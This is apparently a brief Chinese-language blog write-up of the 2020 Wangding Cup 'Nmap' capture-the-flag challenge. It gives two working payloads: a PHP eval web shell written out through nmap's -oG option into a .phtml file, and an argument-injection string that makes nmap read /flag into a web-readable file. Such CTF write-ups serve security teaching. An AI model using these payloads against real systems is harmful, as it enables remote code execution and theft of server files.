[网鼎杯 2020 朱雀组]Nmap

考点:Nmap命令
解题:
Em.....考的对namp的命令熟悉,有两种方式

一种:<?= @eval($_POST["cmd"]);?> -oG shell.phtml
这是使用短标签和phtml绕过对php的过滤

还有一种:127.0.0.1' -iL /flag -oN flag.txt '
这里是将/flag写入到网站目录的flag.txt

此条目发表在nmap写shell, 一些小trick分类目录。将固定链接加入收藏夹。

发表评论

电子邮件地址不会被公开。 必填项已用*标注